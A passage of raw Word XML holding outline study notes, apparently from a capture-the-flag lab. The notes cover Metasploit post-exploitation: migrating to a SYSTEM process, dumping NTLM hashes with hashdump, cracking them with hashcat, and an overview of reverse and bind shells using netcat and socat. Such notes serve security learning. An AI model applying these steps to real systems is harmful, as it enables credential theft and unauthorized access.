      <w:r w:rsidRPr="0084205E">
        <w:t>Find session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD1499" w14:textId="095BE27E" w:rsidR="00A1784C" w:rsidRPr="0084205E" w:rsidRDefault="00A1784C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Set session #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380ED5DA" w14:textId="386B7D3F" w:rsidR="00A1784C" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00A1784C" w:rsidRPr="0084205E">
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DBF2DD" w14:textId="679B3C49" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sessions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;new #&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964AE69" w14:textId="69AF1639" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“shell” command allows return to victim shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF46C6F" w14:textId="35CCE738" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to check user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0C5BBE" w14:textId="10CF16AE" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Background to return to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73A5C1B0" w14:textId="399A9ACD" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">List processes via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31861B" w14:textId="7B171B10" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find NT AUTHORITY\SYSTEM and write down PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076340B" w14:textId="6FBAA8E4" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Toward bottom of list for low impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE2996" w14:textId="0C0B7B6E" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Migrate to process using “migrate &lt;PID&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AEF26" w14:textId="153C17D6" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Dump non-default </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> password and crack it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B34AD" w14:textId="157A33BE" w:rsidR="00263099" w:rsidRPr="0084205E" w:rsidRDefault="00263099" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Run command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C1FB932" w14:textId="4371A31C" w:rsidR="00660FB7" w:rsidRPr="0084205E" w:rsidRDefault="00660FB7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user names</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="798B439C" w14:textId="14FA67D2" w:rsidR="00590D39" w:rsidRPr="0084205E" w:rsidRDefault="00590D39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DAB98" w14:textId="03A5F593" w:rsidR="00590D39" w:rsidRPr="0084205E" w:rsidRDefault="00590D39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Jon:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>1000:aad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d::: (NTLM/LM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAC4A6" w14:textId="53C7AEB8" w:rsidR="00590D39" w:rsidRPr="0084205E" w:rsidRDefault="00590D39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E86AEBF" w14:textId="683A0A9B" w:rsidR="00590D39" w:rsidRPr="0084205E" w:rsidRDefault="00590D39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Separate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>at :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15B5CBBB" w14:textId="1B12194B" w:rsidR="00590D39" w:rsidRPr="0084205E" w:rsidRDefault="00590D39" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Also navigate through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> as one would in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> line to find flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20610832" w14:textId="230FE393" w:rsidR="00681B22" w:rsidRPr="0084205E" w:rsidRDefault="00681B22" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passwords – C:/indows/system32/config/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A4FDA" w14:textId="39E13DC2" w:rsidR="00681B22" w:rsidRPr="0084205E" w:rsidRDefault="00681B22" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">User folders, especially ones </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID’d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> as system owners or admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B158B" w14:textId="678D2DB1" w:rsidR="00744069" w:rsidRPr="0084205E" w:rsidRDefault="00744069" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C65249" w14:textId="22BE2EDC" w:rsidR="00744069" w:rsidRPr="0084205E" w:rsidRDefault="00F1124C" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shells – Sending/Receiving (Reverse/Bind) Shells When Exploiting Target Machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF1582" w14:textId="2B94FECB" w:rsidR="00F1124C" w:rsidRPr="0084205E" w:rsidRDefault="00F1124C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shells are used when interfacing with a Command Line environment (CLI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF8837" w14:textId="5413B7DE" w:rsidR="00F1124C" w:rsidRPr="0084205E" w:rsidRDefault="00F1124C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Such as common bash or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> programs in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1381A4CE" w14:textId="5CA1A089" w:rsidR="00F1124C" w:rsidRPr="0084205E" w:rsidRDefault="00F1124C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Cmd.exe and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> on windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F98838F" w14:textId="05DF625B" w:rsidR="00F1124C" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Possible to sometimes force an application running on the server to execute arbitrary code – use initial access to obtain a shell running on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCEF09" w14:textId="0F5B4FAD" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Reverse shell – remote server sends command line access to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C4982" w14:textId="0F40C447" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Bind shell – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>open up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> port on server that can be connected to for execution of commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B68666" w14:textId="1768A7B0" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F5D0FF" w14:textId="17DB3BD7" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281992F4" w14:textId="49DAB2CC" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Swiss army knife</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A1413" w14:textId="04E04058" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Manually perform network interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11253F" w14:textId="1AAC2AEA" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Banner grabbing during enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F71CA9" w14:textId="52DD8442" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Receive reverse shells and connect to remote ports attached to bind shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727C094" w14:textId="7A876657" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shells are unstable by default but can be improved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E1FAD" w14:textId="04756620" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26DB8E74" w14:textId="705EE630" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> netcat but stronger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1C351" w14:textId="0F03008D" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default shells are more stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0138DF0B" w14:textId="4EE7DCC3" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>However</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428E992" w14:textId="705EB793" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax is more difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB56ED2" w14:textId="4256E727" w:rsidR="00BD35D1" w:rsidRPr="0084205E" w:rsidRDefault="00BD35D1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Very rarely installed by default</w:t>
      </w:r>
    </w:p>
